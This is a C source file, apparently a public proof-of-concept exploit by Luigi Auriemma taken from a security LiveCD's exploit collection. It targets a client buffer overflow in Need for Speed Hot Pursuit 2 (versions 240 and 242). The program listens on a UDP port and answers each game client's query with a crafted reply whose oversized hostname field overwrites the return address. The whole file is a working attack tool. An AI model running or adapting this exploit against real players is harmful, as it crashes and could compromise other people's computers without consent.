home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / nfs2 / nfshp2cbof.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  5KB  |  186 lines

---

1. /*
2.  
3. by Luigi Auriemma
4.  
5. UNIX & WIN VERSION
6. */
7.  
8.  
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <string.h>
12.  
13. #ifdef WIN32
14.     #include <winsock.h>
15.     #include "winerr.h"
16.  
17.     #define close   closesocket
18. #else
19.     #include <unistd.h>
20.     #include <sys/socket.h>
21.     #include <sys/types.h>
22.     #include <arpa/inet.h>
23.     #include <netdb.h>
24. #endif
25.  
26.  
27.  
28.  
29.  
30.  
31. #define VER     "0.1"
32. #define BUFFSZ  2048
33. #define PORT    61220
34. #define RETADD  0xdeadc0de
35. #define RETOFF  540
36. #define NFS240  "18022640"
37. #define NFS242  "18088178"
38. #define NFSOFF  669     /* referred to pck[] nver, don't change it */
39.  
40.  
41.  
42.  
43.  
44.  
45. void std_err(void);
46.  
47.  
48.  
49.  
50.  
51.  
52. int main(int argc, char *argv[]) {
53.     int         sd,
54.                 err,
55.                 on = 1,
56.                 psz;
57.     struct  sockaddr_in peer;
58.     u_char      *buff,
59.                 pck[] =
60.                 "\\gamename\\nfs6"
61.                 "\\gamever\\240"    // it is useless
62.                 "\\hostname\\"
63.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
64.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
65.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
66.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
67.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
68.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
69.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
70.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
71.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
72.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
73.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
74.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
75.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
76.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
77.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
78.                 "aaaaaaaaaaaaaaaaaaaaaaaa"
79.                 "0000"              // return address
80.                 "\\hostport\\8511"
81.                 "\\mapname\\Fall Winds"
82.                 "\\gametype\\Single Race"
83.                 "\\numplayers\\1"
84.                 "\\maxplayers\\8"
85.                 "\\gamemode\\openplaying"
86.                 "\\pbmd\\0"
87.                 "\\password\\0"
88.                 "\\nver\\" NFS240
89.                 "\\ctid\\6"
90.                 "\\res\\38"
91.                 "\\dir\\0"
92.                 "\\laps\\2"
93.                 "\\ded\\0"
94.                 "\\final\\"
95.                 "\\queryid\\2.1";
96.  
97.  
98.     setbuf(stdout, NULL);
99.  
100.     fputs("\n"
101.         "Need for Speed Hot pursuit 2 <= 242 client's buffer overflow "VER"\n"
102.         "by Luigi Auriemma\n"
103.         "e-mail: aluigi@altervista.org\n"
104.         "web:    http://aluigi.altervista.org\n"
105.         "\n", stdout);
106.  
107.     if(argc < 2) {
108.         printf("\nUsage: %s <version>\n"
109.             "\n"
110.             "Version:\n"
111.             "240 = this is the default (1.0) and more diffused version\n"
112.             "242 = the latest patched version, rarely used by players\n"
113.             "\n", argv[0]);
114.         exit(1);
115.     }
116.  
117.  
118.     if(!memcmp(argv[1], "240", 3)) {
119.         printf("Selected version 240 (nver %s)\n", NFS240);
120.     } else if(!memcmp(argv[1], "242", 3)) {
121.         printf("Selected version 242 (nver %s)\n", NFS242);
122.         memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
123.     } else {
124.         printf("\nError: you must choose between 240 and 242 only\n");
125.         exit(1);
126.     }
127.  
128.  
129. #ifdef WIN32
130.     WSADATA    wsadata;
131.     WSAStartup(MAKEWORD(1,0), &wsadata);
132. #endif
133.  
134.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
135.     if(sd < 0) std_err();
136.  
137.     peer.sin_addr.s_addr = INADDR_ANY;
138.     peer.sin_port        = htons(PORT);
139.     peer.sin_family      = AF_INET;
140.     psz                  = sizeof(peer);
141.  
142.     printf("\nBinding UDP port %u\n", PORT);
143.  
144.     err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
145.     if(err < 0) std_err();
146.     err = bind(sd, (struct sockaddr *)&peer, psz);
147.     if(err < 0) std_err();
148.  
149.     printf("The return address will be overwritten with 0x%08x\n", RETADD);
150.     *(u_long *)(pck + RETOFF) = RETADD;
151.  
152.     buff = malloc(BUFFSZ);
153.     if(!buff) std_err();
154.  
155.     fputs("Clients:\n", stdout);
156.     while(1) {
157.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
158.         if(err < 0) std_err();
159.  
160.         printf("%16s:%hu -> ",
161.             inet_ntoa(peer.sin_addr), htons(peer.sin_port));
162.  
163.         err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz);
164.         if(err < 0) std_err();
165.         fputs("BOOM\n", stdout);
166.     }
167.  
168.     close(sd);
169.     return(0);
170. }
171.  
172.  
173.  
174.  
175.  
176.  
177. #ifndef WIN32
178.     void std_err(void) {
179.         perror("\nError");
180.         exit(1);
181.     }
182. #endif
183.  
184.  
185.  
186.